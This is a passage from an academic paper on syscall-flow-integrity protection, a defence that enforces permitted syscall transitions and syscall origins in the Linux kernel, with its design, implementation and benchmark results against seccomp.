required to work correctly.
Control-flow integrity [1] (CFI) is a mitigation that
limits control-flow transfers within an application to a set
of pre-determined locations. While CFI has demonstrated
that it can prevent attacks, it is not infallible [29]. Once
it has been circumvented, the underlying system and its
interfaces are once again exposed to an attacker as CFI
does not apply protection across security domains.
In the early 2000s, Wagner and Dean [65] proposed an
automatic, static analysis approach that generates syscall
digraphs, i.e., a k-sequence [19] of consecutive syscalls of
length 2. A runtime monitor validates whether a transition
is possible from the previous syscall to the current one
and raises an alarm if it is not. The Secure Computing
interface of Linux [18], seccomp, simplifies the concept
by only validating whether a syscall is allowed, but not
whether it is allowed in the context of the previous one.
Recent work has explored hardware support for Linux
seccomp to improve its performance [60]. In contrast
to the work by Wagner and Dean [65] and other intru-
sion detection systems [21, 25, 32, 34, 44, 68, 47, 63, 69],
seccomp acts as an enforcement tool instead of a simple
monitoring system. Hence, false positives are not accept-
able as they would terminate a benign application. Thus,
we ask the following questions in this paper:
Can the concept of CFI be applied to the user-kernel
boundary? Can prior syscall-transition-based intrusion
detection models, e.g., digraph models [65], be trans-
formed into an enforcement mechanism without breaking
modern applications?
In this paper, we answer both questions in the affirma-
tive. We introduce the concept of syscall-flow-integrity
protection (SFIP), complementing the concept of CFI
with integrity for user-kernel transitions. Our proof-of-
concept implementation relies on static analysis during
compilation to automatically extract possible syscall tran-
sitions. An application can opt-in to SFIP by providing
the extracted information to the kernel for runtime en-
forcement. SFIP builds on three fully-automated pillars,
a syscall state machine, a syscall-origin mapping, and an
efficient SFIP enforcement in the kernel.
The syscall state machine represents possible transi-
tions according to a syscall digraph model. In contrast to
Wagner and Dean’s [65] runtime monitor, we rely on an
efficient state machine expressed as an N ×N matrix (N
is the number of provided syscalls), that scales even to
large and complex applications. We provide a compiler-
based proof-of-concept implementation, called SysFlow1,
that generates such a state machine instead of individ-
ual sets of k-sequences. For every available syscall, the
state machine indicates to which other syscalls a tran-
sition is possible. Our syscall state machine (i.e., the
modified digraph) has several advantages including faster
lookups (O(1) instead of O(M) with M being the number
of possible k-sequences), easier construction, and less and
constant memory overhead.
The syscall-origin mapping maps syscalls to the lo-
cations at which they can occur. Syscall instructions in a
program may be used to perform different syscalls, i.e.,
a bijective mapping between code location and syscall
number is not guaranteed. We resolve the challenge of
these non-bijective mappings with a mechanism propagat-
ing syscall information from the compiler frontend and
backend to the linker, enabling the precise enforcement
of syscalls and their origin. During the state transition
check, we additionally check whether the current syscall
originates from a location at which it is allowed to occur.
For this purpose, we extend our syscall state machine
with a syscall-origin mapping that can be bijective or
non-bijective, which we extract from the program. Conse-
quently, our approach eliminates syscall-based shellcode
attacks and imposes additional constraints on the con-
struction of ROP chains.
The efficient enforcement of syscall-flow integrity is
implemented in the Linux kernel. Instead of detection,
i.e., logging the intrusion and notifying a user as is the
common task for intrusion detection systems [39], we
focus on enforcement. Our proof-of-concept implemen-
tation places the syscall state machine and non-bijective
syscall-origin mapping inside the Linux kernel. This puts
our enforcement on the same level as seccomp, which
is also used to enforce the correct behavior of an appli-
cation. However, detecting the set of allowed syscalls
for seccomp is easier. As such, our enforcement is an
additional technique to sandbox an application, automati-
1https://github.com/SFIP/SFIP
cally limiting the post-exploitation impact of attacks. We
refer to our enforcement as coarse-grained syscall-flow-
integrity protection, effectively emulating the concept of
control-flow integrity on the syscall level.
We evaluate the performance of SFIP based on our ref-
erence implementation. In a microbenchmark, we only
observe an overhead on the syscall execution of up to
13.1 %, outperforming seccomp-based protections. In
real-world applications, we observe an average overhead
of 7.4 %. In long-running applications, such as ffmpeg,
nginx, and memcached, this overhead is even more neg-
ligible, with less than 1.8 % compared to an unprotected
version. We evaluate the one-time overhead of extracting
the information from a set of real-world applications. In
the worst case, we observe an increase in compilation
time by factor 28.
We evaluate the security of the concept of syscall-flow-
integrity protection in a security analysis with special
focus on control-flow hijacking attacks. We evaluate our
approach on real-world applications in terms of number of
states (i.e., syscalls with at least one outgoing transition),
number of average transitions per state, and other security-
relevant metrics. Based on this analysis, SFIP, on average,
decreases the number of possible transitions by 41.5 %
compared to seccomp and 91.3 % when no protection is
applied. Against control-flow hijacking attacks, we find
that in nginx, a specific syscall can, on average, only be
performed at the location of 3 syscall instructions instead
of in 318 locations. We conclude that syscall-flow in-
tegrity increases system security substantially while only
introducing acceptable overheads.
To summarize, we make the following contributions:
1. We introduce the concept of (coarse-grained) syscall-
flow-integrity protection (SFIP) to enforce legitimate
user-to-kernel transitions based on static analysis of
applications.
2. Our proof-of-concept SFIP implementation is based
on a syscall state machine and a mechanism to validate
a syscall’s origin.
3. We evaluate the security of SFIP quantitatively, show-
ing that the number of possible syscall transitions is
reduced by 91.3 % on average in a set of 8 real-world
applications, and qualitatively by analyzing the impli-
cations of SFIP on a real-world exploit.
4. We evaluate the performance of our SFIP proof-of-
concept implementation, showing an overhead of
13.1 % in a microbenchmark and 7.4 % in a mac-
robenchmark.
2. Background
2.1. Sandboxing
Sandboxing is a technique to constrain the resources of
an application to the absolute minimum necessary for an
application to still work correctly. For instance, a sandbox
might limit an application’s access to files, network, or
syscalls it can perform. A sandbox is often a last line
of defense in an already exploited application, trying to
limit the post-exploitation impact. Sandboxes are widely
deployed in various applications, including in mobile op-
erating systems [30, 3] and browsers [71, 54, 70]. Linux
also provides various methods for sandboxing, including
SELinux [72], AppArmor [4], or seccomp [18].
2.2. Digraph Model
The behavior of an application can be modeled by the
sequence of syscalls it performs. In intrusion detection
systems, windows of consecutive syscalls, so-called k-
sequences, have been used [19]. k-sequences of length
k = 2 are commonly referred to as digraphs [65]. A model
built upon these digraphs allows easier construction and
more efficient checking while reducing the accuracy in
the detection [65] as only previous and current syscall are
considered.
2.3. Linux Seccomp
The syscall interface is a security-critical interface that the
Linux kernel exposes to userspace applications. Applica-
tions rely on syscalls to request the execution of privileged
tasks from the kernel. Hence, securing this interface is
crucial to improving the system’s overall security.
To better secure this interface, the kernel provides
Linux Secure Computing (seccomp). A benign appli-
cation first creates a filter that contains all the syscalls it
intends to perform over its lifetime and then passes this
filter to the kernel. Upon a syscall, the kernel checks
whether the executed syscall is part of the set of syscalls
defined in the filter and either allows or denies it. As such,
seccomp can be seen as a k-sequence of length 1. In addi-
tion to the syscall itself, seccomp can filter static syscall
arguments. Hence, seccomp is an essential technique to
limit the post-exploitation impact of an exploit, as unre-
stricted access to the syscall interface allows an attacker
to arbitrarily read, write, and execute files. An even worse
case is when the syscall interface itself is exploitable, as
this can lead to privilege escalation [37, 36, 38].
2.4. Runtime Attacks
One of the root causes for successful exploits are memory
safety violations. One typical variant of such a violation
are buffer overflows, enabling an attacker to modify the
application in a malicious way [62]. An attacker tries to
use such a buffer overflow to overwrite a code pointer,
such that the control flow can be diverted to an attacker-
chosen location, e.g., to previously injected shellcode.
Attacks relying on shellcode have become harder to exe-
cute on modern systems due to data normally not being
executable [62, 49]. Therefore, attacks have to rely on
already present, executable code parts, so-called gadgets.
These gadgets are chained together to perform an arbi-
trary attacker-chosen task [51]. Shacham further general-
ized this attack technique as return-oriented programming
(ROP) [59]. Similar to control-flow-hijacking attacks that
overwrite pointers [59, 11, 43, 29, 56], memory safety vi-
olations can also be abused in data-only attacks [55, 35].
2.5. Control-Flow Integrity
Control-flow integrity [1] (CFI) is a concept that restricts
an application’s control flow to valid execution traces, i.e.,
it restricts the targets of control-flow transfer instructions.
This is enforced at runtime by comparing the current
state of the application to a set of pre-computed states.
Control-flow transfers can be divided into forward-edge
and backward-edge transfers [7]. Forward-edge transfers
transfer control flow to a new destination, such as the
target of an (indirect) jump or call. Backward-edge trans-
fers transfer the control flow back to a location that was
previously used in a forward edge, e.g., a return from a
call. Furthermore, CFI can be subdivided into coarse-
grained and fine-grained CFI. In contrast to fine-grained
CFI, coarse-grained CFI allows for a more relaxed control-
flow graph, allowing more targets than necessary [14].
3. Design of Syscall-Flow-Integrity Protec-
tion
3.1. Threat Model
SFIP is applied to a benign userspace application that
potentially contains a vulnerability allowing an attacker
to execute arbitrary code within the application. The
post-exploitation targets the operating system through the
syscall interface to gain kernel privileges. With SFIP, a
syscall is only allowed if the state machine contains a
valid transition from the previous syscall to the current
one and if it originates from a pre-determined location.
If either one is violated, the application is terminated by
the kernel. Similar to prior work [10, 24, 16, 23], our pro-
tection is orthogonal but fully compatible with defenses
such as CFI, ASLR, NX, or canary-based protections.
Therefore, the security it provides to the system remains
even if these other protections have been circumvented.
Side-channel and fault attacks [40, 73, 41, 46, 64, 57] on
the state machine or syscall-origin mapping are out of
scope.
3.2. High-Level Design
In this section, we discuss the high-level design be-
hind SFIP. Our approach is based on three pillars: a di-
graph model for syscall sequences, a per-syscall model of
syscall origin, and the strict enforcement of these models
(cf. Figure 1).
Source Code
L01 :
void foo ( int
bit ) {
L02 :
s y s c a l l ( open ,
. . . ) ;
L03 :
i f ( bit )
L04 :
s y s c a l l ( read ,
. . . ) ;
L05 :
else
L06 :
s y s c a l l ( write ,
. . . ) ;
L07 :
s y s c a l l ( close ,
. . . ) ;
L08 :
}
Pillar I: State Transitions
” Transitions ” :
{
”open” :
[ read ,
write ] ,
” read ” :
[ c l o s e ] ,
” write ” :
[ c l o s e ]
}
Pillar II: Origins
” Origins ” :
{
”open” :
[ L02 ] ,
” read ” :
[ L04 ] ,
” write ” :
[ L06 ] ,
” c l o s e ” :
[ L07 ]
}
Pillar III: Kernel Enforcement
i f
( ! t r a n s i t i o n p o s s i b l e ()
| |
! v a l i d o r i g i n ( ) )
terminate app ( ) ;
else
// execute
s y s c a l l
extract
install
1
Figure 1: The three pillars of SFIP on the example of a
function. The first pillar models possible syscall transi-
tions, the second maps syscalls to their origin, and the
third enforces them.
For our first pillar, we rely on the idea of a digraph
model from Wagner and Dean [65]. For our sycall-flow-
integrity protection, we rely on a more efficient construc-
tion and in-memory representation. In contrast to their
approach, we express the set of possible transitions not
as individual k-sequences, but as a global syscall ma-
trix of size N ×N, with N being the number of available
syscalls. We refer to the matrix as our syscall state ma-
chine. With this representation, verifying whether a tran-
sition is possible is a simple lookup in the row indicated
by the previous syscall and the column indicated by the
currently executing syscall. Even though the representa-
tion of the sequences differs, the set of valid transitions
remains the same: every transition that is marked as valid
in our syscall state machine must also be a valid transition
if expressed in the way discussed by Wagner and Dean.
Our representation has several advantages though, that
we explore in this paper, namely faster lookups (O(1)),
less memory overhead, and easier construction.
Our syscall state machine can already be used for
coarse-grained SFIP to improve the system’s security (cf.
Section 5.2). However, the second pillar, the validation
of the origin of a specific syscall, further improves the
provided security guarantees by adding additional, en-
forceable information. The basis for this augmentation is
the ability to map syscalls to the location at which they
can be invoked, independent of whether it is a bijective or
non-bijective mapping. We refer to the resulting mapping
as our syscall-origin mapping. For instance, our mapping
might contain the information that the syscall instruction
1 void foo(int bit, int nr) {
2
syscall(open, ...);
3
if(bit)
4
syscall(read, ...);
5
else
6
syscall(nr, ...);
7
bar(...);
8
syscall(close, ...);
9 }
10
Listing 1: Example of a dummy program with multiple
syscall-flow paths.
located at address 0x7ffff7ecbc10 can only execute
the syscalls write and read. Neither unaligned execution
(e.g., in a ROP chain) nor code inserted at runtime is in
our syscall-origin mapping. Thus, syscalls can only be
executed at already existing syscall instructions.
The third pillar is the enforcement of the syscall state
machine and the syscall-origin mapping. Wagner and
Dean [65] proposed their runtime monitoring as a concept
for intrusion detection systems. There is still a domain
expert involved to decide on any further action [39]. In
contrast to monitoring, enforcement cannot afford false
positives as this immediately leads to the termination of
the application in benign scenarios. However, enforce-
ment provides better security than monitoring as immedi-
ate action is undertaken, completely eliminating the time
window for a possible exploit. Thus, by the use case of
SFIP, namely enforcement of syscall-flow integrity, our
concept is more closely related to seccomp but harder to
realize than seccomp-based enforcement of syscalls.
3.3. Challenges
Previous automation work for seccomp filters outlined
several challenges for automatically detecting an appli-
cation’s syscalls [10]. While several works [10, 16, 24]
solve these challenges, none provides the full information
required for SFIP. The challenges of getting this miss-
ing information focus on precise syscall information and
inter- and intra-procedural control-flow transfer informa-
tion. We illustrate the challenges using a simple dummy
program in Listing 1.
C1: Precise Per-Function Syscall Information
The
first challenge focuses on precise per-function syscall
information.
This challenge must be solved for the
generation of the syscall state machine as well as the
sycall-origin map. For seccomp-based approaches, i.e., k-
sequence of length 1, an automatic approach only needs to
identify the set of syscalls within a function, i.e., the exact
location of the syscalls is irrelevant. This does not hold
for SFIP, which requires precise information at which
location a specific syscall is executed. Thus, we have to
detect that the first syscall instruction always executes
the open syscall, the second executes read, and the third
syscall instruction can execute any syscall that can be
specified via nr. For the state machine generation, the pre-
cise information of syscall locations provides parts of the
information required to correctly generate the sequence of
syscalls. For the syscall-origin map, the precise informa-
tion allows generating the mapping of syscall instructions
to actual syscalls in the case where syscall numbers are
specified as a constant at the time of invocation.
C2: Argument-based Syscall Invocations
The second
challenge extends upon C1 as it concerns syscall loca-
tions where the actual syscall executed cannot be easily
determined at the time of compilation. When parsing the
function foo, we can identify the syscall number for all
invocations of the syscall function where the number is
specified as a constant. The exception is the third invoca-
tion, as the number is provided by the caller of the foo
function. As the call to the function, and hence the ac-
tual syscall number, is in a different translation unit than
the actual syscall invocation, the possibility for a non-
bijective mapping exists. Still, an automated approach
must determine all possible syscalls that can be invoked
at each syscall instruction.
C3: Correct Inter- and Intra-Procedural Control-Flow
Graph
Precise per-function syscall information on its
own is not sufficient to generate syscall state machines due
to the non-linearity of typical code. Solving C1 and C2
provides the information which syscalls occur at which
syscall location, but does not provide the information on
the execution order. A trivial construction algorithm can
assume that each syscall within a function can follow
each other syscall, but this overapproximation leads to
imprecise state machines. Such an approach accepts a
transition from read to the syscall identified by nr as valid,
even though it cannot occur within our example function.
Therefore, we need to determine the correct inter- and
intra-procedural control-flow transfers in an application.
The correct intra-procedural control-flow graph allows
determining the possible sequences within a function. In
our example, and if function bar does not contain any
syscalls, it provides the information that the sequence of
syscalls open → read → close is valid, while open → nr
→ close (where nr ̸= read) is not.
Even in the presence of a correct intra-procedural
control-flow graph, we cannot reconstruct the syscall state
machine of an application as information is missing on
the sequence of syscalls from other called functions. For
instance, if function bar contains at least one syscall, the
sequence of open → read → close is no longer valid.
Hence, we additionally need to recover the precise loca-
tion where control flow is transferred to another function
Source Code
L01 :
void foo ( int
t e s t ) {
L02 :
scanf ( . . . ) ;
L03 :
i f ( t e s t )
L04 :
p r i n t f ( . . . )
L05 :
else
L06 :
s y s c a l l ( read ,
. . . ) ;
L07 :
int
ret = bar ( . . . ) ;
L08 :
i f ( ! ret )
L09 :
e x i t ( 0 ) ;
L10 :
return
ret ;
L11 :
}
Extracted Function Info
{
” Transitions ” :
{
”L03” :
[ L04 , L06 ] ,
”L04” :
[ L07 ] ,
”L06” :
[ L07 ]
”L08” :
[ L09 , L10 ]
}
” Call
Targets ” :
{
”L02” :
[ ” scanf ” ] ,
”L04” :
[ ” p r i n t f ” ] ,
”L07” :
[ ”bar” ] ,
”L09” :
[ ” e x i t ” ] ,
}
” S y s c a l l s ” :
{
”L06”
:
[ read ]
}
}
extract
1
Figure 2: A simplified example of the information that is ex-
tracted from a function. Transitions identifies control-flow
transfers between basic blocks, Call Targets the location
of a call to another function and the targets name, Syscalls
the location of the syscall and the corresponding syscall
number.
and the target of this control-flow transfer. By combining
the inter- and intra-procedural control-flow graph, the cor-
rect syscall sequences of an application can be modeled.
Constructing a precise control-flow graph is known to
be a challenging task to solve efficiently [2, 31], espe-
cially in the presence of indirect control-flow transfers.
These algorithms are often cubic in the size of the ap-
plication, which makes them infeasible for large-scale
applications. In the construction of the control-flow graph
and, by extension, the generation of the syscall state ma-
chine and syscall-origin mapping, other factors, such as
aliased and referenced functions, must be considered as
well as functions that are passed as arguments to other
functions, e.g., the entry function for a new thread created
with pthread_create. Any form of imprecision can
lead to the termination of the application by the runtime
enforcement.
4. Implementation
In this section, we discuss our proof-of-concept imple-
mentation SysFlow and how we systematically solve
the challenges outlined in Section 3.3 to provide fully-
automated SFIP.
SysFlow
SysFlow automatically generates the state ma-
chine and the syscall-origin mapping while compiling an
application. As the basis of SysFlow we considered the
works by Ghavamnia et al. [24] and Canella et al. [10].
4.1. State-Machine Extraction
In SysFlow, the linker is responsible for creating the final
state machine. The construction works as follows: The
linker starts at the main function, i.e., the user-defined
entry point of an application, and recursively follows the
ordered set of control-flow transfers. Upon encountering a
syscall location, the linker adds a transition from the previ-
ous syscall(s) to the newly encountered syscall. If control
flow continues at a different function, the set of last valid
syscall states is passed to the recursive visit of the en-
countered function. Upon returning from a recursive visit,
the linker updates the set of last valid syscall states and
continues processing the function. During the recursive
processing, it also considers aliased and referenced func-
tions. A special case, and source of overapproximation,
are indirect calls, which we address with appropriate tech-
niques from previous works [10, 16, 23]. The resulting
syscall state machine and our support libarary are embed-
ded in the static binary. We discuss the support library in
more detail in Section 4.3.
Building the state machine requires that precise infor-
mation of the syscalls a function executes (C1) and a
control-flow graph of the application (C3) is available
to the linker. Both the front- and backend are involved
in collecting this information. The frontend extracts the
information from the LLVM IR generated from C source
code, while the backend extracts the information from
assembly files. Figure 2 illustrates the information that is
extracted from a function.
Extracting Precise Syscall Information
In the fron-
tend, we iterate over every IR instruction of a function and
determine the used syscalls. In the backend, we iterate
over every assembly instruction to extract the syscalls.
Extracting the information in the front- and backend suc-
cessfully solves C1.
Extracting Precise Control-Flow Information
Recov-
ering the control-flow graph (C3) in the frontend requires
two different sources of information: IR call instructions
and successors of basic blocks. The former allows track-
ing inter-procedural control-flow transfers while the lat-
ter allows tracking intra-procedural transfers. For inter-
procedural transfers, we iterate over every IR instruction
and determine whether it is a call to an external function.
For direct calls, we store the target of the call; for indirect
calls, we store the function signature of the target function.
In addition, we also gather information on referenced and
aliased functions, as well as functions that are passed as
arguments to other functions. For the intra-procedural
transfers, we track the successors of each basic block.
In the backend, we perform similar steps, although on
a platform-specific assembly level. Extracting this in-
formation in the front- and backend successfully solves
C3.
4.2. Syscall-Origin Extraction
In SysFlow, the linker also generates the final syscall-
origin mapping. The mapping maps all reachable syscalls
to the locations where they can occur. We extract the
information as an offset instead of an absolute position to
facilitate compatibility with ASLR. The linker requires
precise information of syscalls, i.e., their offset relative
to the start of the encapsulating function, and a precise
call graph of the application. Both the front- and backend
are responsible for providing this information. Figure 3
illustrates the extraction. From the frontend, the syscall
information generated by the state machine extraction
is re-used (C1). A challenge is the possibility of non-
bijective syscall mappings (C2).
Non-Bijective Syscall Mappings
If the syscall number
cannot be determined at the location of a syscall instruc-
tion, a non-bijective mapping exists for the instruction,
i.e., multiple syscalls can be executed through it. An ex-
ample of such a case is shown in Listing 1. In such cases,
the backend itself cannot create a mapping of a syscall
to the syscall instruction. Hence, it must propagate the
syscall number and the syscall offset from their respective
translation unit to the linker, which can then merge it,
solving C2.
4.3. Installation
For each syscall, the binary contains a list of all other
reachable syscalls as an N ×N matrix, i.e., the state ma-
chine, with N being the number of syscalls available.
Valid transitions are indicated by a 1 in the matrix, invalid
ones with a 0 to allow fast checks and constant memory
overhead. If a function contains a syscall, the offset of the
syscall is added to the load address of the function. The
state machine and the syscall-origin mapping are sent to
the kernel and installed.
4.4. Kernel Enforcement
In this section, we discuss the third and final pillar of
SFIP: enforcement of the syscall flow and origin where
every violation leads to immediate process termination.
Our Linux kernel is based on version 5.13 configured
for Ubuntu 21.04 with the following modifications.
First, a new syscall, SYS_syscall_sequence, which takes
as arguments the state machine, the syscall-origin map-
ping, and a flag that identifies the requested mode, i.e.,
is state-machine enforcement requested, syscall-origin
enforcement, or both. The kernel rejects updates to al-
ready installed syscall-flow information. Consequently,
an unprivileged process cannot apply a malicious state
machine or syscall origins before invoking a setuid binary
or other privileged programs using the exec syscall [17].
Second, our syscall-flow-integrity checks are executed
before every syscall. We create a new syscall_work_bit
entry, which determines whether or not the kernel uses
the slow syscall entry path, like in seccomp, to ensure that
our checks are executed. Upon installation, we set the
respective bit in the syscall_work flag in the thread_info
struct of the requesting task.
Translation Unit 1
L01 :
void func () {
.func:39:
L02 :
asm( ” s y s c a l l ” : : ”a” ( 3 9 ) ) ;
. . .
.syscall cp:3:
L08 :
s y s c a l l c p ( close , 0 ) ;
L09 :
}
Translation Unit 2
L01 :
s y s c a l l c p :
. . .
L06 :
mov %rcx ,% r s i
L07 :
mov 8(%rsp ),% r8
.syscall cp:-1:
L08 :
s y s c a l l
. . .
Extraction TU 1
” Of fsets ” :
{
” func ” :
{
”39” :
[ L02 ]
}
}
”Unknown O ff sets ” :
{
” s y s c a l l c p ” :
[ 3 ]
}
Extraction TU 2
”Unknown S y s c a l l s ” :
{
” s y s c a l l c p ” :
[ L08 ]
}
Linker
” Of fsets ” :
{
” func ” :
{
”39” :
[ L02 ]
} ,
” s y s c a l l c p ” :
{
”3” :
[ L08 ]
}
}
extract
merge
1
Figure 3: A simplified example of the syscall-origin extraction. Inserted red labels mark the location of a syscall and
encode available information. The extraction deconstructs the label and calculates the offset using the label’s address
from the symbol table. The linker combines the information from each translation unit and generates the final syscall-
origin mapping.
Third, the syscall-flow information has to be stored
and cleaned up properly. As it is never modified after
installation, it can be shared between the parent and child
processes and threads. Upon task cleanup, we decrease
the reference counter, and if it reaches 0, we free the re-
spective memory. The current state, i.e., the previously
executed syscall, is not shared between threads or pro-
cesses and is thus part of every thread.
Enforcing State Machine Transitions
Each thread and
process tracks its own current state in the state machine.
As we enforce sequence lengths of size 2, storing the pre-
viously executed syscall as the current state is sufficient
for the enforcement. Due to the design of our state ma-
chine, verifying whether a syscall is allowed is a single
lookup in the matrix at the location indicated by the pre-
vious and current syscall. If the entry indicates a valid
transition, we update our current state to the currently
executing syscall and continue with the syscall execution.
Otherwise, the kernel immediately terminates the offend-
ing application. The simple state machine lookup, with a
complexity of O(1), ensures that only a small overhead
is introduced to the syscall (cf. Sections 5.1.2 and 5.1.3).
Enforcing Syscall Origins
The enforcement of the
syscall origins is very efficient due to its design. Our
modified kernel uses the current syscall to retrieve the set
of possible locations from the mapping to check whether
the current RIP, minus the size of the syscall instruction
itself, is a part of the retrieved set. If not, the application
requested the syscall from an unknown location, which
results in the kernel immediately terminating it. By de-
sign, the complexity of this lookup is O(N), with N being
the number of valid offsets for that syscall. We evaluate
typical values of N in Section 5.2.6.
5. Evaluation
In this section, we evaluate the general idea of SFIP and
our proof-of-concept implementation SysFlow. In the
evaluation, we focus on the performance and security of
the syscall state machines and syscall-origins individually
and combined. We evaluate the overhead introduced on
syscall executions in both a micro- and macrobenchmark.
We also evaluate the time required to extract the required
information from a selection of real-world applications.
Our second focus is the security provided by SFIP.
We first consider the protection SFIP provides against
control-flow hijacking attacks. We evaluate the security
of pure syscall-flow protection, pure syscall-origin pro-
tection, and combined protection. We discuss mimicry
attacks and how SFIP makes such attacks harder. We
also consider the security of the stored information in the
kernel and discuss the possibility of an attacker manipu-
lating it. Finally, we extract the state machines and syscall
origins from several real-world applications and analyze
them. We evaluate several security-relevant metrics such
as the number of states in the state machine, average
possible transitions per state, and the average number of
allowed syscalls per syscall location.
State
Origin
Combined
None
Seccomp
0
200
400
326
329
341
302
348
320
320
332
292
336
Cycles
average
min
Figure 4: Microbenchmark of the getppid syscall over
100 million executions. We evaluate SFIP with only state
machine, only syscall origin, both, and no enforcement
active. For comparison, we also benchmark the overhead
of seccomp.
5.1. Performance
5.1.1. Setup All performance evaluations are performed
on an i7-4790K running Ubuntu 21.04 and our modified
Linux 5.13 kernel. For all evaluations, we ensure a stable
frequency.
5.1.2.
Microbenchmark We perform a microbench-
mark to determine the overhead our protection introduces
on syscall executions. Our benchmark evaluates the la-
tency of the getppid syscall, a syscall without side ef-
fects that is also used by kernel developers and previous
works [6, 10, 33]. SysFlow first extracts the state ma-
chine and the syscall-origin information from our bench-
mark program, which we then execute once for every
mode of SFIP, i.e., state machine, syscall origins, and
combined. Each execution measures the latency of 100
million syscall invocations. For comparison, we also
benchmark the execution with no active protection. As
with seccomp, syscalls performed while our protection is
active require the slow syscall enter path to be taken. As
the slow path introduces part of the overhead, we addi-
tionally measure the performance of seccomp in the same
experiment setup.
Results
Figure 4 shows the results of the microbench-
mark. Our results indicate a low overhead for the syscall
execution for all SFIP modes. Transition checks show an
overhead of 8.15 %, syscall origin 9.13 %, and combined
13.1 %. Seccomp introduces an overhead of 15.23 %. The
improved seccomp has a complexity of O(1) for simple
allow/deny filters [12], the same as our state machine.
The syscall-origin check has a complexity of O(N), with
typically small numbers for N, i.e., N = 1 for the getppid
syscall in the microbenchmark. Section 5.2.6 provides a
more thorough evaluation of N in real-world applications.
The additional overhead in seccomp is due to its filters
being written in cBPF and converted to and executed as
eBPF.
5.1.3.
Macrobenchmark To demonstrate that SFIP
can be applied to large-scale, real-world applications
Table 1: The results of our extraction time evaluation in
real world applications. We present both the compilation
time of the respective application with and without our
extraction active.
Application
Unmodified
Average / SEM
Modified
Average / SEM
ffmpeg
162.12 s / 0.78
1783.15 s / 10.61
mupdf
58.01 s / 0.71
489.85 s / 0.68
nginx
8.22 s / 0.03
226.64 s / 1.67
busybox
16.09 s / 0.08
81.33 s / 0.14
coreutils
5.50 s / 0.02
14.39 s / 0.41
memcached
2.90 s / 0.03
4.59 s / 0.01
pwgen
0.07 s / 0.00
0.12 s / 0.00
with a minimal performance overhead, we perform a
macrobenchmark using applications used in previous
work [10, 24, 60]. We measure the performance over 100
executions with only state machine, only syscall origin,
both, and no enforcement active. For nginx, we measure
the time it takes to process 100 000 requests. For ffmpeg,
we convert a video (21 MB) from one file format to an-
other. With pwgen, we generate a set of passwords while
coreutils and memcached are benchmarked using their
respective testsuites. In all cases, we verified that syscalls
are being executed, e.g., each request for nginx executes
at least 13 syscalls.
Results
Figure 5 shows the results of the macrobench-
mark. In nginx, we observe a small increase in execution
time when any mode of SFIP is active. If both checks are
performed, the average increase from 24.96 s to 25.34 s
(+1.52 %) is negligible. We observe similar overheads
in the ffmpeg benchmark. For the combined checks, we
only observe an increase from 9.41 s to 9.58 s (+1.52 %).
pwgen and coreutils show the highest overhead. pwgen
is a small application that performs its task in under a
second; hence any increase appears large. The absolute
change in runtime is an increase of 0.05 s. For the core-
utils benchmark, we execute the testsuite that involves all
103 utilities. Each utility requires that the SFIP informa-
tion is copied to the kernel, which introduces a majority
of the overhead. As the long-running applications show,
the actual runtime overhead is less than 1.8 %. Our results
demonstrate that SFIP is a feasible concept for modern,
large-scale applications.
5.1.4. Extraction-Time Benchmark We evaluate the
time it takes to extract the information required for the
state machine and syscall origins. As targets, we use
several real-world applications (cf. Table 1) used in previ-
ous works on automated seccomp sandboxing [10, 24, 16].
These range from smaller utility applications such as busy-
ffmpeg
nginx
pwgen
coreutils
memcached
0
0.5
1
1.5
+3.93 %
+1.08 %
+13.33 %
+6.5 %
+0.5 %
+2.98 %
+1.2 %
+13.33 %
+9.83 %
+0.34 %
+1.81 %
+1.52 %
+20 %
+12.42 %
+1.06 %
+0 %
+0 %
+0 %
+0 %
+0 %
Normalized
Overhead
State
Sysloc
Combined
None
Figure 5: We perform a macrobenchmark using 5 real-world applications. For nginx, we measure the time it takes
to handle 100 000 requests using ab. For ffmpeg, we convert a video (21 MB) from one file format to another. pwgen
generates a set of passwords while coreutils and memcached are benchmarked using their respective testsuites. Each
benchmark measures the average execution time over 100 repetitions of each mode of SFIP.
box and coreutils to applications with a larger and more
complex codebase such as ffmpeg, mupdf, and nginx. For
the benchmark, we compile each application 10 times us-
ing our modified compiler with and without our extraction
active.
Results
Table 1 shows the result of the extraction-time
benchmark. We present the average compilation time
and the standard error for compiling each application 10
times. The results indicate that the extraction introduces
a significant overhead. For instance, for the coreutils ap-
plications, we observe an increase in compilation time
from approximately 6 s to 15 s. We observe the largest
increase in nginx from approximately 8 s to 227 s. Most
of the overhead is in the linker, while the extraction in
the frontend and backend is fast. We expect that a full
implementation can significantly improve upon the ex-
traction time by employing more efficient caching and by
potentially applying other construction algorithms.
Similar to previous work [24], we consider the increase
in compilation time not to be prohibitive as it is a one-
time cost. Hence, the security improvement outweighs
the increase in compilation time.
5.2. Security
In this section, we evaluate the security provided by SFIP.
We discuss the theoretical security benefit of each mode of
SFIP in the context of control-flow-hijacking attacks. We
then evaluate a real vulnerability in BusyBox version 1.4.0
and later2. We also consider mimicry attacks [65, 66] and
2https://ssd-disclosure.com/ssd-advisory-busybox-
local-cmdline-stack-buffer-overwrite/
perform an analysis of real-world state machines and
syscall origins.
5.2.1. Syscall-Flow Integrity in the Context of Con-
trol-flow Hijacking In the threat model of SFIP (cf. Sec-
tion 3.1), an attacker has control over the program-counter
value of an unprivileged application. In such a situation,
an attacker can either inject code, so-called shellcode,
that is then executed, or reuse existing code in a so-called
code-reuse attack. In a shellcode attack, an attacker man-
ages to inject their own custom code. With control over
the program-counter value, an attacker can redirect the
control flow to the injected code. On modern systems,
these types of attacks are by now harder to execute due to
data execution prevention [62, 49], i.e., data is no longer
executable. As a result, an attacker must first make the
injected code executable, which requires syscalls, e.g.,
the mprotect syscall. For this, an attacker has to rely on
existing code (gadgets) in the exploited application to ex-
ecute such a syscall. An attacker might be lucky, and the
correct parameters are already present in the respective
registers, resulting in a straightforward code-reuse attack
commonly known as ret2libc [51]. Realistically, however,
an attacker first has to get the location and size of the shell-
code area into the corresponding registers using existing
code gadgets. Depending on the type of gadgets, such
attacks are known as return-oriented-programming [59]
or jump-oriented-programming attacks [5].
On an unprotected system, every application can exe-
cute the mprotect syscall. Depending on the application,
the mprotect syscall cannot be blocked by seccomp if
the respective application requires it. With SFIP, attacks
that rely on mprotect can potentially be prevented even
if the application requires the syscall. First, we consider
a system where only the state machine is verified on ev-
ery syscall execution. mprotect is mainly used in the
initialization phase of an application [24, 10]. Hence, we
expect very few other syscalls to have a transition to it, if
any. This leaves a tiny window for an attacker to execute
the syscall to make the shellcode executable, i.e., it is
unlikely that the attempt succeeds in the presence of state-
machine SFIP. Still, with only state-machine checks, the
syscall can originate from any syscall instruction within
the application.
